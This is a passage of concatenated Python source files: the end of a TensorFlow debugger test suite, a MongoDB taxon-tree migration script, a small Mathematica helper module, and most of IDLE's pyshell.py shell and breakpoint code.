r"__dbg_.:0_0_DebugNumericSummary:"):
sess.run(y, options=run_options, run_metadata=run_metadata)
run_options = config_pb2.RunOptions(output_partition_graphs=True)
debug_utils.watch_graph(
run_options,
sess.graph,
debug_ops=["DebugNumericSummary(foo=1.0; mute_if_healthy=true)"],
debug_urls=self._debug_urls())
with self.assertRaisesRegexp(
errors.FailedPreconditionError,
r"1 attribute key\(s\) were not valid for debug node "
r"__dbg_.:0_0_DebugNumericSummary: foo"):
sess.run(y, options=run_options, run_metadata=run_metadata)
def testDebugNumericSummaryMuteOnHealthyMutesOnlyHealthyTensorDumps(self):
with session.Session(config=no_rewrite_session_config()) as sess:
a = variables.Variable(10.0, name="a")
b = variables.Variable(0.0, name="b")
c = variables.Variable(0.0, name="c")
x = math_ops.divide(a, b, name="x")
y = math_ops.multiply(x, c, name="y")
sess.run(variables.global_variables_initializer())
# Here, validate=False is necessary to avoid causality check error.
# TODO(cais): Maybe let DebugDumpDir constructor automatically ignore
# debug ops with mute_if_healthy=false attribute during validation.
_, dump = self._debug_run_and_get_dump(
sess, y, debug_ops=["DebugNumericSummary(mute_if_healthy=true)"],
validate=False)
self.assertEqual(2, dump.size)
self.assertAllClose([[
1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0, np.inf, -np.inf, np.nan,
np.nan, 1.0, 0.0
]], dump.get_tensors("x", 0, "DebugNumericSummary"))
self.assertAllClose([[
1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, np.inf, -np.inf, np.nan,
np.nan, 1.0, 0.0
]], dump.get_tensors("y", 0, "DebugNumericSummary"))
# Another run with the default mute_if_healthy (false) value should
# dump all the tensors.
shutil.rmtree(self._dump_root)
_, dump = self._debug_run_and_get_dump(
sess, y, debug_ops=["DebugNumericSummary()"])
self.assertEqual(8, dump.size)
def testDebugNumericSummaryMuteOnHealthyAndCustomBoundsWork(self):
with session.Session() as sess:
a = variables.Variable([10.0, 10.0], name="a")
b = variables.Variable([10.0, 2.0], name="b")
x = math_ops.add(a, b, name="x") # [20.0, 12.0]
y = math_ops.divide(x, b, name="y") # [2.0, 6.0]
sess.run(variables.global_variables_initializer())
# Here, validate=False is necessary to avoid causality check error.
# TODO(cais): Maybe let DebugDumpDir constructor automatically ignore
# debug ops with mute_if_healthy=false attribute during validation.
_, dump = self._debug_run_and_get_dump(
sess, y, debug_ops=[
"DebugNumericSummary(mute_if_healthy=true; upper_bound=11.0)"],
validate=False)
self.assertEqual(1, dump.size)
self.assertAllClose([[
1.0, 2.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.0, 12.0, 20.0, 16.0, 16.0, 1.0,
1.0, 2.0]], dump.get_tensors("x", 0, "DebugNumericSummary"))
def testDebugQueueOpsDoesNotoErrorOut(self):
with session.Session() as sess:
q = data_flow_ops.FIFOQueue(3, "float", name="fifo_queue")
q_init = q.enqueue_many(([101.0, 202.0, 303.0],), name="enqueue_many")
_, dump = self._debug_run_and_get_dump(sess, q_init)
self.assertTrue(dump.loaded_partition_graphs())
fifo_queue_tensor = dump.get_tensors("fifo_queue", 0, "DebugIdentity")[0]
self.assertIsInstance(fifo_queue_tensor,
debug_data.InconvertibleTensorProto)
self.assertTrue(fifo_queue_tensor.initialized)
self.assertAllClose(
[101.0, 202.0, 303.0],
dump.get_tensors("enqueue_many/component_0", 0, "DebugIdentity")[0])
def testLookUpNodePythonTracebackWorks(self):
with session.Session() as sess:
u_init = constant_op.constant(10.0)
u = variables.Variable(u_init, name="traceback/u")
v_init = constant_op.constant(20.0)
v = variables.Variable(v_init, name="traceback/v")
w = math_ops.multiply(u, v, name="traceback/w")
sess.run(variables.global_variables_initializer())
_, dump = self._debug_run_and_get_dump(sess, w)
# Prior to setting the Python graph, attempts to do traceback lookup
# should lead to exceptions.
with self.assertRaisesRegexp(
LookupError, "Python graph is not available for traceback lookup"):
dump.node_traceback("traceback/w")
dump.set_python_graph(sess.graph)
# After setting the Python graph, attempts to look up nonexistent nodes
# should lead to exceptions.
with self.assertRaisesRegexp(KeyError,
r"Cannot find node \"foo\" in Python graph"):
dump.node_traceback("foo")
# Lookup should work with node name input.
traceback = dump.node_traceback("traceback/w")
self.assertIsInstance(traceback, list)
self.assertGreater(len(traceback), 0)
for trace in traceback:
self.assertIsInstance(trace, tuple)
# Lookup should also work with tensor name input.
traceback = dump.node_traceback("traceback/w:0")
self.assertIsInstance(traceback, list)
self.assertGreater(len(traceback), 0)
for trace in traceback:
self.assertIsInstance(trace, tuple)
class DebugConcurrentRunCallsTest(test_util.TensorFlowTestCase):
"""Test for debugging concurrent Session.run() calls."""
def _get_concurrent_debug_urls(self):
"""Abstract method to generate debug URLs for concurrent debugged runs."""
raise NotImplementedError(
"_get_concurrent_debug_urls is not implemented in the base test class")
def testDebugConcurrentVariableUpdates(self):
if test.is_gpu_available():
self.skipTest("No testing concurrent runs on a single GPU.")
with session.Session() as sess:
v = variables.Variable(30.0, name="v")
constants = []
for i in xrange(self._num_concurrent_runs):
constants.append(constant_op.constant(1.0, name="c%d" % i))
incs = [
state_ops.assign_add(
v, c, use_locking=True, name=("inc%d" % i))
for (i, c) in enumerate(constants)
]
sess.run(v.initializer)
concurrent_debug_urls = self._get_concurrent_debug_urls()
def inc_job(index):
run_options = config_pb2.RunOptions(output_partition_graphs=True)
debug_utils.watch_graph(
run_options, sess.graph, debug_urls=concurrent_debug_urls[index])
for _ in xrange(100):
sess.run(incs[index], options=run_options)
inc_threads = []
for index in xrange(self._num_concurrent_runs):
inc_thread = threading.Thread(target=functools.partial(inc_job, index))
inc_thread.start()
inc_threads.append(inc_thread)
for inc_thread in inc_threads:
inc_thread.join()
self.assertAllClose(30.0 + 1.0 * self._num_concurrent_runs * 100,
sess.run(v))
all_session_run_indices = []
for index in xrange(self._num_concurrent_runs):
dump = debug_data.DebugDumpDir(self._dump_roots[index])
self.assertTrue(dump.loaded_partition_graphs())
v_data = dump.get_tensors("v", 0, "DebugIdentity")
self.assertEqual(100, len(v_data))
# Examine all the core metadata files
core_metadata_files = glob.glob(
os.path.join(self._dump_roots[index], "_tfdbg_core*"))
timestamps = []
session_run_indices = []
executor_step_indices = []
for core_metadata_file in core_metadata_files:
with open(core_metadata_file, "rb") as f:
event = event_pb2.Event()
event.ParseFromString(f.read())
core_metadata = (
debug_data.extract_core_metadata_from_event_proto(event))
timestamps.append(event.wall_time)
session_run_indices.append(core_metadata.session_run_index)
executor_step_indices.append(core_metadata.executor_step_index)
all_session_run_indices.extend(session_run_indices)
# Assert that executor_step_index increases by one at a time.
executor_step_indices = zip(timestamps, executor_step_indices)
executor_step_indices = sorted(
executor_step_indices, key=lambda x: x[0])
for i in xrange(len(executor_step_indices) - 1):
self.assertEquals(executor_step_indices[i][1] + 1,
executor_step_indices[i + 1][1])
# Assert that session_run_index increase monotonically.
session_run_indices = zip(timestamps, session_run_indices)
session_run_indices = sorted(session_run_indices, key=lambda x: x[0])
for i in xrange(len(session_run_indices) - 1):
self.assertGreater(session_run_indices[i + 1][1],
session_run_indices[i][1])
# Assert that the session_run_indices from the concurrent run() calls are
# all unique.
self.assertEqual(len(all_session_run_indices),
len(set(all_session_run_indices)))
if __name__ == "__main__":
googletest.main()
|
migrate_taxon_tree.py | from datanator_query_python.config import motor_client_manager
import asyncio
import simplejson as json
from pymongo import UpdateOne
from pymongo.errors import BulkWriteError
from pprint import pprint
class MigrateTaxon:
def __init__(self, collection="taxon_tree", to_database="datanator-test",
from_database="datanator", max_entries=float("inf")):
self.collection = collection
self.to_database = to_database
self.from_collection = motor_client_manager.client.get_database(from_database)[collection]
self.to_collection = motor_client_manager.client.get_database(to_database)[collection]
self.max_entries = max_entries
async def index_primary(self, _key, background=True):
"""Index key (single key ascending)
Args:
_key(:obj:`str`): Name of key to be indexed.
background(:obj:`bool`): Building index in the background.
"""
yield self.to_collection.create_index(_key, background=background)
async def get_rank(self, ids, names):
''' Given a list of taxon ids, return
the list of ranks. no rank = '+'
Args:
ids(:obj:`list` of :obj:`int`): list of taxon ids [1234,2453,431]
names(:obj:`list` of :obj:`str`): list of taxon names.
Return:
(:obj:`tuple`): canon_anc_id, canon_anc_name
'''
canon_anc_id = []
canon_anc_name = []
roi = ['species', 'genus', 'family', 'order', 'class', 'phylum', 'kingdom', 'superkingdom']
projection = {'rank': 1}
for _id, name in zip(ids, names):
if _id == 131567:
canon_anc_id.append(_id)
canon_anc_name.append(name)
continue
query = {'tax_id': _id}
doc = await self.from_collection.find_one(filter=query, projection=projection)
rank = doc.get('rank', None)
if rank in roi:
canon_anc_id.append(_id)
canon_anc_name.append(name)
return canon_anc_id, canon_anc_name
async def process_cursors(self, skip=0): # docs, l, counter
"""Process mongodb cursor (for parallel processing)
Transform data and move to new database
Args:
docs(:obj:`pymongo.Cursor`): documents to be processed
l(:obj:`multiprocess.Lock`): order verbose message.
counter(:obj:`Counter`): to keep track of processor progress across parallel processes.
"""
bulk_write = []
if self.max_entries == float("inf"):
limit = 0
else:
limit = self.max_entries
docs = self.from_collection.find(filter={}, projection={'_id': 0},
no_cursor_timeout=True, batch_size=1000,
limit=limit)
i = 0
async for doc in docs:
i += 1
if i != 0 and i % 100 == 0:
print("Processing file {}".format(i))
try:
self.to_collection.bulk_write(bulk_write)
bulk_write = []
except BulkWriteError as bwe:
pprint(bwe.details)
bulk_write = []
canon_anc_names = []
canon_anc_ids = []
anc_ids = doc['anc_id']
anc_names = doc['anc_name']
canon_anc_ids, canon_anc_names = await self.get_rank(anc_ids, anc_names)
doc['canon_anc_ids'] = canon_anc_ids
doc['canon_anc_names'] = canon_anc_names
doc['schema_version'] = '2'
bulk_write.append(UpdateOne({'tax_id': doc['tax_id']}, {'$set': doc}, upsert=True))
if len(bulk_write) != 0:
try:
self.to_collection.bulk_write(bulk_write)
except BulkWriteError as bwe:
pprint(bwe.details)
finally:
print("Done.")
def main():
src = MigrateTaxon(to_database="test")
src.index_primary('tax_id')
# cursors = src.split_cursors(1, 'datanator', 'taxon_tree')
# lock = Lock()
# counter = Counter(0)
# procs = [Process(target=src.process_cursors, args=(docs, lock, counter)) for docs in cursors]
# for p in procs: p.start()
# for p in procs: p.join()
loop = asyncio.get_event_loop()
loop.run_until_complete(src.process_cursors())
if __name__ == '__main__':
main() |
test.py | # import threading
#
# class hello:
# say_hello = False
#
# def poll(cls):
# import time
#
# while not cls.say_hello:
# pass
#
# time.sleep(.1)
# poll(cls)
#
# thd = threading.Thread(target=poll, args=(hello,))
#
# thd.start()
#
# import code
# code.interact(banner="", local=locals())
from PJLink.HelperClasses import *
__getattr__ = None
class MathematicaBlock:
__TOTO = None
__sym_dict = {}
def __init__(self, update_globals = True):
if self.__TOTO is not None:
raise TypeError("MathematicaSyntax is a standalone object")
self.__ns = None
self.__getatt = None
self.__ug = update_globals
def __enter__(self):
if MPackage.initialize_default():
self.__sym_dict.update(dict(MPackage.symbol_list))
self.__sym_dict.update((("Sym", MPackage)))
if self.__ug:
self.__glob = globals().copy()
globals().update(self.__sym_dict)
return self.__sym_dict
def __exit__(self, exc_type, exc_val, exc_tb):
if self.__ug:
globals().clear()
globals().update(self.__glob)
self.__glob = None
# with MathematicaBlock():
# print(Evaluate(Plus(M.a, M.b)))
def floop():
import inspect
return inspect.currentframe().f_back.f_locals |
pyshell.py | #! /usr/bin/env python3
import sys
try:
from tkinter import *
except ImportError:
print("** IDLE can't import Tkinter.\n"
"Your Python may not be configured for Tk. **", file=sys.__stderr__)
raise SystemExit(1)
# Valid arguments for the ...Awareness call below are defined in the following.
# https://msdn.microsoft.com/en-us/library/windows/desktop/dn280512(v=vs.85).aspx
if sys.platform == 'win32':
import ctypes
PROCESS_SYSTEM_DPI_AWARE = 1
try:
ctypes.OleDLL('shcore').SetProcessDpiAwareness(PROCESS_SYSTEM_DPI_AWARE)
except (AttributeError, OSError):
pass
import tkinter.messagebox as tkMessageBox
if TkVersion < 8.5:
root = Tk() # otherwise create root in main
root.withdraw()
from idlelib.run import fix_scaling
fix_scaling(root)
tkMessageBox.showerror("Idle Cannot Start",
"Idle requires tcl/tk 8.5+, not %s." % TkVersion,
parent=root)
raise SystemExit(1)
from code import InteractiveInterpreter
import linecache
import os
import os.path
from platform import python_version
import re
import socket
import subprocess
import threading
import time
import tokenize
import warnings
from idlelib.colorizer import ColorDelegator
from idlelib.config import idleConf
from idlelib import debugger
from idlelib import debugger_r
from idlelib.editor import EditorWindow, fixwordbreaks
from idlelib.filelist import FileList
from idlelib.outwin import OutputWindow
from idlelib import rpc
from idlelib.run import idle_formatwarning, PseudoInputFile, PseudoOutputFile
from idlelib.undo import UndoDelegator
HOST = '127.0.0.1' # python execution server on localhost loopback
PORT = 0 # someday pass in host, port for remote debug capability
# Override warnings module to write to warning_stream. Initialize to send IDLE
# internal warnings to the console. ScriptBinding.check_syntax() will
# temporarily redirect the stream to the shell window to display warnings when
# checking user's code.
warning_stream = sys.__stderr__ # None, at least on Windows, if no console.
def idle_showwarning(
message, category, filename, lineno, file=None, line=None):
"""Show Idle-format warning (after replacing warnings.showwarning).
The differences are the formatter called, the file=None replacement,
which can be None, the capture of the consequence AttributeError,
and the output of a hard-coded prompt.
"""
if file is None:
file = warning_stream
try:
file.write(idle_formatwarning(
message, category, filename, lineno, line=line))
file.write(">>> ")
except (AttributeError, OSError):
pass # if file (probably __stderr__) is invalid, skip warning.
_warnings_showwarning = None
def capture_warnings(capture):
"Replace warning.showwarning with idle_showwarning, or reverse."
global _warnings_showwarning
if capture:
if _warnings_showwarning is None:
_warnings_showwarning = warnings.showwarning
warnings.showwarning = idle_showwarning
else:
if _warnings_showwarning is not None:
warnings.showwarning = _warnings_showwarning
_warnings_showwarning = None
capture_warnings(True)
def extended_linecache_checkcache(filename=None,
orig_checkcache=linecache.checkcache):
"""Extend linecache.checkcache to preserve the <pyshell#...> entries
Rather than repeating the linecache code, patch it to save the
<pyshell#...> entries, call the original linecache.checkcache()
(skipping them), and then restore the saved entries.
orig_checkcache is bound at definition time to the original
method, allowing it to be patched.
"""
cache = linecache.cache
save = {}
for key in list(cache):
if key[:1] + key[-1:] == '<>':
save[key] = cache.pop(key)
orig_checkcache(filename)
cache.update(save)
# Patch linecache.checkcache():
linecache.checkcache = extended_linecache_checkcache
class PyShellEditorWindow(EditorWindow):
"Regular text edit window in IDLE, supports breakpoints"
def __init__(self, *args):
self.breakpoints = []
EditorWindow.__init__(self, *args)
self.text.bind("<<set-breakpoint-here>>", self.set_breakpoint_here)
self.text.bind("<<clear-breakpoint-here>>", self.clear_breakpoint_here)
self.text.bind("<<open-python-shell>>", self.flist.open_shell)
self.breakpointPath = os.path.join(
idleConf.userdir, 'breakpoints.lst')
# whenever a file is changed, restore breakpoints
def filename_changed_hook(old_hook=self.io.filename_change_hook,
self=self):
self.restore_file_breaks()
old_hook()
self.io.set_filename_change_hook(filename_changed_hook)
if self.io.filename:
self.restore_file_breaks()
self.color_breakpoint_text()
rmenu_specs = [
("Cut", "<<cut>>", "rmenu_check_cut"),
("Copy", "<<copy>>", "rmenu_check_copy"),
("Paste", "<<paste>>", "rmenu_check_paste"),
(None, None, None),
("Set Breakpoint", "<<set-breakpoint-here>>", None),
("Clear Breakpoint", "<<clear-breakpoint-here>>", None)
]
def color_breakpoint_text(self, color=True):
"Turn colorizing of breakpoint text on or off"
if self.io is None:
# possible due to update in restore_file_breaks
return
if color:
theme = idleConf.CurrentTheme()
cfg = idleConf.GetHighlight(theme, "break")
else:
cfg = {'foreground': '', 'background': ''}
self.text.tag_config('BREAK', cfg)
def set_breakpoint(self, lineno):
text = self.text
filename = self.io.filename
text.tag_add("BREAK", "%d.0" % lineno, "%d.0" % (lineno+1))
try:
self.breakpoints.index(lineno)
except ValueError: # only add if missing, i.e. do once
self.breakpoints.append(lineno)
try: # update the subprocess debugger
debug = self.flist.pyshell.interp.debugger
debug.set_breakpoint_here(filename, lineno)
except: # but debugger may not be active right now....
pass
def set_breakpoint_here(self, event=None):
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
lineno = int(float(text.index("insert")))
self.set_breakpoint(lineno)
def clear_breakpoint_here(self, event=None):
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
lineno = int(float(text.index("insert")))
try:
self.breakpoints.remove(lineno)
except:
pass
text.tag_remove("BREAK", "insert linestart",\
"insert lineend +1char")
try:
debug = self.flist.pyshell.interp.debugger
debug.clear_breakpoint_here(filename, lineno)
except:
pass
def clear_file_breaks(self):
if self.breakpoints:
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
self.breakpoints = []
text.tag_remove("BREAK", "1.0", END)
try:
debug = self.flist.pyshell.interp.debugger
debug.clear_file_breaks(filename)
except:
pass
def store_file_breaks(self):
"Save breakpoints when file is saved"
# XXX 13 Dec 2002 KBK Currently the file must be saved before it can
# be run. The breaks are saved at that time. If we introduce
# a temporary file save feature the save breaks functionality
# needs to be re-verified, since the breaks at the time the
# temp file is created may differ from the breaks at the last
# permanent save of the file. Currently, a break introduced
# after a save will be effective, but not persistent.
# This is necessary to keep the saved breaks synched with the
# saved file.
#
# Breakpoints are set as tagged ranges in the text.
# Since a modified file has to be saved before it is
# run, and since self.breakpoints (from which the subprocess
# debugger is loaded) is updated during the save, the visible
# breaks stay synched with the subprocess even if one of these
# unexpected breakpoint deletions occurs.
breaks = self.breakpoints
filename = self.io.filename
try:
with open(self.breakpointPath, "r") as fp:
lines = fp.readlines()
except OSError:
lines = []
try:
with open(self.breakpointPath, "w") as new_file:
for line in lines:
if not line.startswith(filename + '='):
new_file.write(line)
self.update_breakpoints()
breaks = self.breakpoints
if breaks:
new_file.write(filename + '=' + str(breaks) + '\n')
except OSError as err:
if not getattr(self.root, "breakpoint_error_displayed", False):
self.root.breakpoint_error_displayed = True
tkMessageBox.showerror(title='IDLE Error',
message='Unable to update breakpoint list:\n%s'
% str(err),
parent=self.text)
def restore_file_breaks(self):
self.text.update() # this enables setting "BREAK" tags to be visible
if self.io is None:
# can happen if IDLE closes due to the .update() call
return
filename = self.io.filename
if filename is None:
return
if os.path.isfile(self.breakpointPath):
with open(self.breakpointPath, "r") as fp:
lines = fp.readlines()
for line in lines:
if line.startswith(filename + '='):
breakpoint_linenumbers = eval(line[len(filename)+1:])
for breakpoint_linenumber in breakpoint_linenumbers:
self.set_breakpoint(breakpoint_linenumber)
def update_breakpoints(self):
"Retrieves all the breakpoints in the current window"
text = self.text
ranges = text.tag_ranges("BREAK")
linenumber_list = self.ranges_to_linenumbers(ranges)
self.breakpoints = linenumber_list
def ranges_to_linenumbers(self, ranges):
lines = []
for index in range(0, len(ranges), 2):
lineno = int(float(ranges[index].string))
end = int(float(ranges[index+1].string))
while lineno < end:
lines.append(lineno)
lineno += 1
return lines
# XXX 13 Dec 2002 KBK Not used currently
# def saved_change_hook(self):
# "Extend base method - clear breaks if module is modified"
# if not self.get_saved():
# self.clear_file_breaks()
# EditorWindow.saved_change_hook(self)
def _close(self):
"Extend base method - clear breaks when module is closed"
self.clear_file_breaks()
EditorWindow._close(self)
class PyShellFileList(FileList):
"Extend base class: IDLE supports a shell and breakpoints"
# override FileList's class variable, instances return PyShellEditorWindow
# instead of EditorWindow when new edit windows are created.
EditorWindow = PyShellEditorWindow
pyshell = None
def open_shell(self, event=None):
if self.pyshell:
self.pyshell.top.wakeup()
else:
self.pyshell = PyShell(self)
if self.pyshell:
if not self.pyshell.begin():
return None
return self.pyshell
class ModifiedColorDelegator(ColorDelegator):
"Extend base class: colorizer for the shell window itself"
def __init__(self):
ColorDelegator.__init__(self)
self.LoadTagDefs()
def recolorize_main(self):
self.tag_remove("TODO", "1.0", "iomark")
self.tag_add("SYNC", "1.0", "iomark")
ColorDelegator.recolorize_main(self)
def LoadTagDefs(self):
ColorDelegator.LoadTagDefs(self)
theme = idleConf.CurrentTheme()
self.tagdefs.update({
"stdin": {'background':None,'foreground':None},
"stdout": idleConf.GetHighlight(theme, "stdout"),
"stderr": idleConf.GetHighlight(theme, "stderr"),
"console": idleConf.GetHighlight(theme, "console"),
})
def removecolors(self):
# Don't remove shell color tags before "iomark"
for tag in self.tagdefs:
self.tag_remove(tag, "iomark", "end")
class ModifiedUndoDelegator(UndoDelegator):
"Extend base class: forbid insert/delete before the I/O mark"
def insert(self, index, chars, tags=None):
try:
if self.delegate.compare(index, "<", "iomark"):
self.delegate.bell()
return
except TclError:
pass
UndoDelegator.insert(self, index, chars, tags)
def delete(self, index1, index2=None):
try:
if self.delegate.compare(index1, "<", "iomark"):
self.delegate.bell()
return
except TclError:
pass
UndoDelegator.delete(self, index1, index2)
class MyRPCClient(rpc.RPCClient):
def handle_EOF(self):
"Override the base class - just re-raise EOFError"
raise EOFError
class ModifiedInterpreter(InteractiveInterpreter):
def __init__(self, tkconsole):
self.tkconsole = tkconsole
locals = sys.modules['__main__'].__dict__
InteractiveInterpreter.__init__(self, locals=locals)
self.save_warnings_filters = None
self.restarting = False
self.subprocess_arglist = None
self.port = PORT
self.original_compiler_flags = self.compile.compiler.flags
_afterid = None
rpcclt = None
rpcsubproc = None
def spawn_subprocess(self):
if self.subprocess_arglist is None:
self.subprocess_arglist = self.build_subprocess_arglist()
self.rpcsubproc = subprocess.Popen(self.subprocess_arglist)
def build_subprocess_arglist(self):
assert (self.port!=0), (
"Socket should have been assigned a port number.")
w = ['-W' + s for s in sys.warnoptions]
# Maybe IDLE is installed and is being accessed via sys.path,
# or maybe it's not installed and the idle.py script is being
# run from the IDLE source directory.
del_exitf = idleConf.GetOption('main', 'General', 'delete-exitfunc',
default=False, type='bool')
if __name__ == 'idlelib.pyshell':
command = "__import__('idlelib.run').run.main(%r)" % (del_exitf,)
else:
command = "__import__('run').main(%r)" % (del_exitf,)
return [sys.executable] + w + ["-c", command, str(self.port)]
def start_subprocess(self):
addr = (HOST, self.port)
# GUI makes several attempts to acquire socket, listens for connection
for i in range(3):
time.sleep(i)
try:
self.rpcclt = MyRPCClient(addr)
break
except OSError:
pass
else:
self.display_port_binding_error()
return None
# if PORT was 0, system will assign an 'ephemeral' port. Find it out:
self.port = self.rpcclt.listening_sock.getsockname()[1]
# if PORT was not 0, probably working with a remote execution server
if PORT != 0:
# To allow reconnection within the 2MSL wait (cf. Stevens TCP
# V1, 18.6), set SO_REUSEADDR. Note that this can be problematic
# on Windows since the implementation allows two active sockets on
# the same address!
self.rpcclt.listening_sock.setsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR, 1)
self.spawn_subprocess()
#time.sleep(20) # test to simulate GUI not accepting connection
# Accept the connection from the Python execution server
self.rpcclt.listening_sock.settimeout(10)
try:
self.rpcclt.accept()
except socket.timeout:
self.display_no_subprocess_error()
return None
self.rpcclt.register("console", self.tkconsole)
self.rpcclt.register("stdin", self.tkconsole.stdin)
self.rpcclt.register("stdout", self.tkconsole.stdout)
self.rpcclt.register("stderr", self.tkconsole.stderr)
self.rpcclt.register("flist", self.tkconsole.flist)
self.rpcclt.register("linecache", linecache)
self.rpcclt.register("interp", self)
self.transfer_path(with_cwd=True)
self.poll_subprocess()
return self.rpcclt
def restart_subprocess(self, with_cwd=False, filename=''):
if self.restarting:
return self.rpcclt
self.restarting = True
# close only the subprocess debugger
debug = self.getdebugger()
if debug:
try:
# Only close subprocess debugger, don't unregister gui_adap!
debugger_r.close_subprocess_debugger(self.rpcclt)
except:
pass
# Kill subprocess, spawn a new one, accept connection.
self.rpcclt.close()
self.terminate_subprocess()
console = self.tkconsole
was_executing = console.executing
console.executing = False
self.spawn_subprocess()
try:
self.rpcclt.accept()
except socket.timeout:
self.display_no_subprocess_error()
return None
self.transfer_path(with_cwd=with_cwd)
console.stop_readline()
# annotate restart in shell window and mark it
console.text.delete("iomark", "end-1c")
tag = 'RESTART: ' + (filename if filename else 'Shell')
halfbar = ((int(console.width) -len(tag) - 4) // 2) * '='
console.write("\n{0} {1} {0}".format(halfbar, tag))
console.text.mark_set("restart", "end-1c")
console.text.mark_gravity("restart", "left")
if not filename:
console.showprompt()
# restart subprocess debugger
if debug:
# Restarted debugger connects to current instance of debug GUI
debugger_r.restart_subprocess_debugger(self.rpcclt)
# reload remote debugger breakpoints for all PyShellEditWindows
debug.load_breakpoints()
self.compile.compiler.flags = self.original_compiler_flags
self.restarting = False
return self.rpcclt
def __request_interrupt(self):
self.rpcclt.remotecall("exec", "interrupt_the_server", (), {})
def interrupt_subprocess(self):
threading.Thread(target=self.__request_interrupt).start()
def kill_subprocess(self):
if self._afterid is not None:
self.tkconsole.text.after_cancel(self._afterid)
try:
self.rpcclt.listening_sock.close()
except AttributeError: # no socket
pass
try:
self.rpcclt.close()
except AttributeError: # no socket
pass
self.terminate_subprocess()
self.tkconsole.executing = False
self.rpcclt = None
def terminate_subprocess(self):
"Make sure subprocess is terminated"
try:
self.rpcsubproc.kill()
except OSError:
# process already terminated
return
else:
try:
self.rpcsubproc.wait()
except OSError:
return
def transfer_path(self, with_cwd=False):
if with_cwd: # Issue 13506
path = [''] # include Current Working Directory
path.extend(sys.path)
else:
path = sys.path
self.runcommand("""if 1:
import sys as _sys
_sys.path = %r
del _sys
\n""" % (path,))
active_seq = None
def poll_subprocess(self):
clt = self.rpcclt
if clt is None:
return
try:
response = clt.pollresponse(self.active_seq, wait=0.05)
except (EOFError, OSError, KeyboardInterrupt):
# lost connection or subprocess terminated itself, restart
# [the KBI is from rpc.SocketIO.handle_EOF()]
if self.tkconsole.closing:
return
response = None
self.restart_subprocess()
if response:
self.tkconsole.resetoutput()
self.active_seq = None
how, what = response
console = self.tkconsole.console
if how == "OK":
if what is not None:
print(repr(what), file=console)
elif how == "EXCEPTION":
if self.tkconsole.getvar("<<toggle-jit-stack-viewer>>"):
self.remote_stack_viewer()
elif how == "ERROR":
errmsg = "pyshell.ModifiedInterpreter: Subprocess ERROR:\n"
print(errmsg, what, file=sys.__stderr__)
print(errmsg, what, file=console)
# we received a response to the currently active seq number:
try:
self.tkconsole.endexecuting()
except AttributeError: # shell may have closed
pass
# Reschedule myself
if not self.tkconsole.closing:
self._afterid = self.tkconsole.text.after(
self.tkconsole.pollinterval, self.poll_subprocess)
debugger = None
def setdebugger(self, debugger):
self.debugger = debugger
def getdebugger(self):
return self.debugger
def open_remote_stack_viewer(self):
"""Initiate the remote stack viewer from a separate thread.
This method is called from the subprocess, and by returning from this
method we allow the subprocess to unblock. After a bit the shell
requests the subprocess to open the remote stack viewer which returns a
static object looking at the last exception. It is queried through
the RPC mechanism.
"""
self.tkconsole.text.after(300, self.remote_stack_viewer)
return
def remote_stack_viewer(self):
from idlelib import debugobj_r
oid = self.rpcclt.remotequeue("exec", "stackviewer", ("flist",), {})
if oid is None:
self.tkconsole.root.bell()
return
item = debugobj_r.StubObjectTreeItem(self.rpcclt, oid)
from idlelib.tree import ScrolledCanvas, TreeNode
top = Toplevel(self.tkconsole.root)
theme = idleConf.CurrentTheme()
background = idleConf.GetHighlight(theme, 'normal')['background']
sc = ScrolledCanvas(top, bg=background, highlightthickness=0)
sc.frame.pack(expand=1, fill="both")
node = TreeNode(sc.canvas, None, item)
node.expand()
# XXX Should GC the remote tree when closing the window
gid = 0
def execsource(self, source):
"Like runsource() but assumes complete exec source"
filename = self.stuffsource(source)
self.execfile(filename, source)
def execfile(self, filename, source=None):
"Execute an existing file"
if source is None:
with tokenize.open(filename) as fp:
source = fp.read()
if use_subprocess:
source = (f"__file__ = r'''{os.path.abspath(filename)}'''\n"
+ source + "\ndel __file__")
try:
code = compile(source, filename, "exec")
except (OverflowError, SyntaxError):
self.tkconsole.resetoutput()
print('*** Error in script or command!\n'
'Traceback (most recent call last):',
file=self.tkconsole.stderr)
InteractiveInterpreter.showsyntaxerror(self, filename)
self.tkconsole.showprompt()
else:
self.runcode(code)
def runsource(self, source):
"Extend base class method: Stuff the source in the line cache first"
filename = self.stuffsource(source)
self.more = 0
self.save_warnings_filters = warnings.filters[:]
warnings.filterwarnings(action="error", category=SyntaxWarning)
# at the moment, InteractiveInterpreter expects str
assert isinstance(source, str)
#if isinstance(source, str):
# from idlelib import iomenu
# try:
# source = source.encode(iomenu.encoding)
# except UnicodeError:
# self.tkconsole.resetoutput()
# self.write("Unsupported characters in input\n")
# return
try:
# InteractiveInterpreter.runsource() calls its runcode() method,
# which is overridden (see below)
return InteractiveInterpreter.runsource(self, source, filename)
finally:
if self.save_warnings_filters is not None:
warnings.filters[:] = self.save_warnings_filters
self.save_warnings_filters = None
def stuffsource(self, source):
"Stuff source in the filename cache"
filename = "<pyshell#%d>" % self.gid
self.gid = self.gid + 1
lines = source.split("\n")
linecache.cache[filename] = len(source)+1, 0, lines, filename
return filename
def prepend_syspath(self, filename):
"Prepend sys.path with file's directory if not already included"
self.runcommand("""if 1:
_filename = %r
import sys as _sys
from os.path import dirname as _dirname
_dir = _dirname(_filename)
if not _dir in _sys.path:
_sys.path.insert(0, _dir)
del _filename, _sys, _dirname, _dir
\n""" % (filename,))
def showsyntaxerror(self, filename=None):
"""Override Interactive Interpreter method: Use Colorizing
Color the offending position instead of printing it and pointing at it
with a caret.
"""
tkconsole = self.tkconsole
text = tkconsole.text
text.tag_remove("ERROR", "1.0", "end")
type, value, tb = sys.exc_info()
msg = getattr(value, 'msg', '') or value or "<no detail available>"
lineno = getattr(value, 'lineno', '') or 1
offset = getattr(value, 'offset', '') or 0
if offset == 0:
lineno += 1 #mark end of offending line
if lineno == 1:
pos = "iomark + %d chars" % (offset-1)
else:
pos = "iomark linestart + %d lines + %d chars" % \
(lineno-1, offset-1)
tkconsole.colorize_syntax_error(text, pos)
tkconsole.resetoutput()
self.write("SyntaxError: %s\n" % msg)
tkconsole.showprompt()
def showtraceback(self):
"Extend base class method to reset output properly"
self.tkconsole.resetoutput()
self.checklinecache()
InteractiveInterpreter.showtraceback(self)
